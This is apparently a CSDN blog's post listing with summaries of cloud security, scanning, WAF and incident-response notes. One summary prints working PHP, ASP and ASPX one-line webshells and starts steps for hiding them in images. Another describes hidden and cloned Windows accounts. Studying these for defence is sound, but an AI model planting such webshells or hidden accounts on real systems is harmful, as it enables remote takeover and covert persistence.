Kyl2n-优快云博客

原创 IS-CMM成熟度模型与CMMI的联系

特性经典CMMI模型IS-CMM模型核心维度过程能力（如何做事）战略驱动（为何做事）等级名称初始、已管理、已定义、量化管理、优化初始、合规驱动、风险驱动、数据驱动、对抗驱动关注点过程的可重复性、标准化、可测量和优化安全工作的动机、决策依据和应对的威胁级别应用范围通用（软件开发、服务、采购、安全过程专用（信息安全战略与能力）关系是基础哲学。一个达到CMMI 3级“已定义”水平的安全团队，自然有能力实现“风险驱动”。是具体应用。它用信息安全的语言重新包装了成熟度的概念，更具指导性。两个模型结合使用。

2025-09-19 17:04:03 970

原创基于IPDRR模型能力，每个能力的概念及所要具备的能力&产品

基于IPDRR模型能力，每个能力的概念及所要具备的能力&产品。

2025-09-19 15:34:23 906

原创【阿里存储桶OSS】桶ACL解释

本文介绍了OSS存储桶的三种权限设置：公共读写（public-read-write）、公共读（public-read）和私有（private）。公共读写允许任何人读写数据，存在数据泄露和费用激增风险；公共读仅允许所有者写入，但所有人可读取；私有权限默认仅所有者可读写。警告提示公共权限可能导致安全问题，建议谨慎使用。默认情况下，OSS资源为私有权限，可通过授权策略分享特定访问权限。

2025-09-05 16:07:11 326

原创【云存储桶安全】怎么满足业务需求，又最大程度上满足信息安全要求呢？

前端：用户选择文件。身份验证上传：前端使用预签名URL直接上传文件到私有存储桶的目录。触发：文件上传成功触发Lambda函数。扫描：Lambda函数启动一个ClamAV容器扫描该文件。处理如果安全：Lambda函数将文件移动到目录，并更新数据库记录状态。同时可以生成缩略图等。如果恶意：Lambda函数立即删除该文件，并触发告警通知安全团队，记录该用户ID和IP。读取：应用程序始终只从目录读取文件提供给用户。通过这套组合拳，你可以在提供公共写功能的同时，最大限度地控制风险，保护你的系统和数据。

2025-09-01 15:18:52 999

原创 DES S盒算法

根据行号和列号，从对应的S盒表中找到对应的4位输出值（0~15的十进制，再转为4位二进制）。如需其他S盒（S2~S8）的具体表格或进一步解释，可参考FIPS PUB 46-3标准文档。DES（Data Encryption Standard）算法中的。是核心非线性组件，负责混淆数据。

2025-08-14 09:14:49 723

原创华为云安全组默认规则

华为安全组规则遵循白名单原理，当在规则中没有明确定义允许或拒绝某条流量时，安全组一律拒绝该流量流入或者流出实例。

2025-08-06 09:38:55 2679

原创【互联网开源免费的溯源网站】

接触最早的情报平台，平台根据用户等级对应不同的免费额度，有钱可充实。可获取IP或域名历史解析记录、开放端口、数字证书等的关联信息，仅供参考，有些历史记录，不一定准确。https://chaipip.com/aiwen.html 可通过ip地址溯源地理位置，大致判断攻击者位置。结合其他社工信息判断溯源准确性，可能存在误报。毕竟是免费的，不能要求太高；测试下来这个网站的精确度相对较高，但是每天有20个限额，且用且珍惜。

2025-08-01 14:05:57 253

原创 redis数据库登录测试

【代码】redis数据库登录测试。

2025-07-25 14:53:19 106

原创域名在线状态判断工具

【代码】域名在线状态判断工具。

2025-07-25 14:50:25 113

原创批量测试域名是否具备WAF防护的工具

支持检测阿里云、华为云和百度云的WAF防护。

2025-07-25 14:43:12 222

原创使用Masscan批量测试指定网段及其端口开放情况

场景举例：想快速判断192.168.3.0/24、172.16.8.0/24、172.15.9.0/23多个网段中21,22,23,3306,1521,27017,6379,1433,3389,5432等敏感端口的开放情况，并输出到文档中；快速获知端口开放情况，但对准确度要求不高。为什么Masscan快呢？因为他不管对方会不会回应你，他只管先把消息发出去再说。简单概括：深度选择Nmap，广度选择Masscan。

2025-07-10 11:05:22 343

原创阿里云EIP、NLB EIP、SLB 公网IP、ALB EIP、SLB EIP、NAT EIP概念之间的区别

变更NLB实例的网络类型 | 负载均衡 https://help.aliyun.com/zh/slb/network-load-balancer/user-guide/change-the-network-type-of-an-nlb-instance。什么是网络型负载均衡NLB | 负载均衡 https://help.aliyun.com/zh/slb/network-load-balancer/product-overview/what-is-nlb/## 标题。

2025-07-10 09:46:47 1076

原创【阿里云安全组配置】

安全组规则优先级的数值越小，代表优先级越高。因此，拒绝策略的优先级应低于允许策略的优先级，这样允许策略的安全组规则才能生效，以实现实例仅对指定网站的出方向访问。以上规则表示：允许安全组内实例访问47.96.XX.XX上80端口的HTTP服务和访问121.199.XX.XX上443端口的HTTPS服务，除此之外其他出方向的访问均不允许。系统基于协议、端口、授权对象匹配到多条安全组规则后，会继续通过优先级和授权策略来判定最终生效的安全组规则，最终结果为允许访问时才建立会话。限制ECS实例访问外部网站。

2025-07-07 14:35:09 303

原创阿里云 WAF CNAME接入与透明接入的区别及风险分析

阿里云WAF提供CNAME和透明接入两种防护方式。CNAME接入需修改DNS解析，支持所有源站但需手动回源配置，存在DNS变更风险；透明接入无需修改DNS，仅支持阿里云ECS/公网SLB，可实现批量域名防护。关键区别在于：CNAME适用于多云环境单域名防护，透明接入适合阿里云内快速部署。建议根据业务场景选择，并提前评估网络架构兼容性与风险。两种方式均需关注证书同步、源站保护等关键配置。

2025-07-07 13:46:15 1100

原创【基础学习-linux命令】-【update 和 upgrade 的区别】

upgrade 指将软件或系统升级到更高的版本，通常涉及较大的功能改进或架构变化。update 通常指对现有软件或系统进行小的修改，修复漏洞或提供新的功能。update 不会改变软件的主要版本号，通常以补丁或安全更新的形式发布。在命令行中，upgrade 常用于安装可用的更新或升级软件包。在软件开发中，update 可能不会破坏现有兼容性，而 upgrade 可能需要用户适应新的界面或功能。update 和 upgrade 是两个常用于描述软件或系统变化的术语，但它们的含义和使用场景不同。

2025-06-23 11:01:36 849

原创批量测试多个网段指定端口的开放情况的小工具（支持windows）

批量测试多个网段指定端口的端口开放情况。

2025-05-07 15:12:17 281

原创用于批量测试IP状态的小工具

【代码】用于批量测试IP状态的小工具。

2025-01-06 14:04:24 288

原创一句话木马图片制作

常见一句话木马：php的一句话木马： <?php @eval($_POST['pass']);?>asp的一句话是： <%eval request (“pass”)%>aspx的一句话是： <%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%>使用工具：一台能使用cmd命令的电脑步骤1：在记事本中加入一句话木马，保存。如：a.txt准备一张图片（文件大小

2020-11-05 10:56:26 2771 1

原创 Nmap手册（转自http://www.nmap.com.cn/doc/manual.shtm）

译注该Nmap参考指南中文版由Fei Yang fyang1024@gmail.com和Lei Lililei_721@6611.org 从英文版本翻译而来。我们希望这将使全世界使用中文的人们更了解Nmap，但我们不能保证该译本和官方的英文版本一样完整，也不能保证同步更新。它可以在Creative Commons Attribution License下被修改并重新发布。选项概要当Nmap不带选项运行时，该选项概要会被输出，最新的版本在这里 http://www.insecure.org/nma

2020-09-02 10:55:16 1548

原创网站访问测试

···import requestsurl_result_success=[]url_result_failed=[]with open(‘C:\Users\hys2500\Desktop\site.txt’, ‘r’) as f:for i in f.readlines():try:response = requests.get(i.strip(), verify=False, allow_redirects=True, timeout=5)if response.status_code

2020-08-28 11:06:37 750

原创 https://blog.51cto.com/professor/1701977https://blog.51cto.com/professor/1701977

https://blog.51cto.com/professor/1701977

2020-05-06 15:10:40 7617

原创 http慢放

https://www.cnblogs.com/endust/p/11960901.html

2020-04-30 16:48:30 186

原创 wireshark 抓包

https://blog.51cto.com/laoyinga/1767613https://www.cnblogs.com/nmap/p/6291683.html

2020-04-30 10:13:47 287

原创 wireshark抓包

https://blog.51cto.com/laoyinga/1767613

2020-04-30 09:23:36 220

原创负载均衡

转载：https://kb.cnblogs.com/page/188170/

2020-04-28 10:43:27 200

原创 WAF绕过

转自：https://www.cnblogs.com/milantgh/p/4265653.html

2020-04-23 15:27:45 214

原创 SQLmap使用

转：https://www.cnblogs.com/hongfei/p/3872156.html

2020-04-22 11:12:52 158

原创 http请求报文知识

转自：https://www.cnblogs.com/lmh001/p/9928517.html

2020-04-20 10:51:32 179

原创 linux查看命令

查看命令学习cat：由第一行开始显示文件内容配合参数：-b ：列出行号，仅针对非空白行做行号显示，空白行不标行号-E：将结尾的断行字符$显示出来--n：显示行数，但是空白行也标行号，与-b 有细微差异-v：列出一些看不出的特殊字符tac：从最后一行开始显示nl：不需要参数，自带显示行数技能head：只看前几行配合 -n 参数 ...

2020-01-21 14:43:55 361

原创 windows克隆账户

**创建隐藏账户**一、在命令行下隐藏的账户当在命令行中创建账户时，若在用户名后加上“$”，则该账户用“net user”命令无法查看到二、在计算机管理中隐藏的账户用上述方法在命令行中创建的账户虽然做到了在命令行下的隐藏，但在“计算机管理”中依然可以看到该账户的存在我们可以对注册表进行相应处理以达到在“计算机管理”中隐藏账户的目的。在注册表下分别将“abc”项及与其相应的“0...

2020-01-09 11:15:30 1525

原创 windows应急响应

前言：排查思路：一、可疑账户普通账户查询克隆账户：复制管理员账户F项值，拥有管理员相同权限及界面的伪装用户二、可疑连接三、自启动项四、计划任务五、资源使用情况...

2020-01-09 10:26:20 827

Kyl2n的博客